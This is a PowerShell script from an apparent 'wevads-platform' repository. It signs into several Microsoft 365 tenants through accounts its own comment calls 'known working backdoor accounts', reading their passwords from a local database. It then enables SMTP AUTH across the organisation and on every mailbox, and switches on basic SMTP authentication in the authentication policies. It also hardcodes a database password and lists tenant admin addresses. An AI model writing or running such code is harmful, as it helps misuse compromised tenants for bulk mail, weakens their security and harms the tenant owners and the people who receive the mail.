yanis/wevads-platform
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
wevads-platform/scripts/enable-smtp-auth-v2.ps1
Yacineutt efb76e0234 BASELINE 26-02-2026 Cursor 5 servers
2026-02-26 04:53:11 +01:00

68 lines
3.0 KiB
PowerShell
Raw Permalink Blame History

#!/usr/bin/env pwsh
$ErrorActionPreference = "Continue"
$env:PGPASSWORD = "admin123"
# Test with known working backdoor accounts
$testAccounts = @(
@{Email="sysadmin_5578@accoff03.onmicrosoft.com"; Tenant="accoff03.onmicrosoft.com"},
@{Email="sysadmin_1652@accoff05.onmicrosoft.com"; Tenant="accoff05.onmicrosoft.com"},
@{Email="sysadmin_8754@accoff04.onmicrosoft.com"; Tenant="accoff04.onmicrosoft.com"}
)
foreach ($acc in $testAccounts) {
$email = $acc.Email
$tenant = $acc.Tenant
# Get password from DB
$pwRaw = & psql -h localhost -U admin -d adx_system -t -A -c "SELECT admin_password FROM office_accounts WHERE admin_email = '$email' LIMIT 1"
$pw = $pwRaw.Trim()
if ([string]::IsNullOrWhiteSpace($pw)) { Write-Host "SKIP $email - no password"; continue }
Write-Host "=== $tenant via $email ==="
try {
$secPwd = ConvertTo-SecureString $pw -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($email, $secPwd)
# Connect to Exchange
Connect-ExchangeOnline -Credential $cred -ShowBanner:$false -ErrorAction Stop
# 1. Enable SMTP AUTH at org level
Set-TransportConfig -SmtpClientAuthenticationDisabled $false -ErrorAction Stop
Write-Host " Transport: SMTP AUTH enabled"
# 2. Enable SMTP AUTH on all mailboxes
$mbs = Get-CASMailbox -ResultSize Unlimited
foreach ($mb in $mbs) {
Set-CASMailbox -Identity $mb.Identity -SmtpClientAuthenticationDisabled $false -ErrorAction SilentlyContinue
}
Write-Host " Mailboxes: $($mbs.Count) configured"
# 3. Check Authentication Policy
try {
$policies = Get-AuthenticationPolicy
foreach ($p in $policies) {
if ($p.AllowBasicAuthSmtp -eq $false) {
Set-AuthenticationPolicy -Identity $p.Name -AllowBasicAuthSmtp:$true -ErrorAction Stop
Write-Host " AuthPolicy: BasicAuthSmtp ENABLED on $($p.Name)"
}
}
} catch { Write-Host " AuthPolicy: $($_.Exception.Message.Substring(0,60))" }
# 4. Test SMTP from PS
Write-Host " Testing SMTP for main admin..."
$mainAdmin = & psql -h localhost -U admin -d adx_system -t -A -c "SELECT admin_email FROM office_accounts WHERE tenant_domain = '$tenant' AND id < 100 LIMIT 1"
$mainPw = & psql -h localhost -U admin -d adx_system -t -A -c "SELECT admin_password FROM office_accounts WHERE tenant_domain = '$tenant' AND id < 100 LIMIT 1"
Write-Host " Main: $($mainAdmin.Trim())"
Disconnect-ExchangeOnline -Confirm:$false -ErrorAction SilentlyContinue
Write-Host " DONE"
}
catch {
Write-Host " FAIL: $($_.Exception.Message.Substring(0, [Math]::Min(80, $_.Exception.Message.Length)))"
Disconnect-ExchangeOnline -Confirm:$false -ErrorAction SilentlyContinue
}
Write-Host ""
}
ENDSCRIPT 2>&1
Reference in New Issue View Git Blame Copy Permalink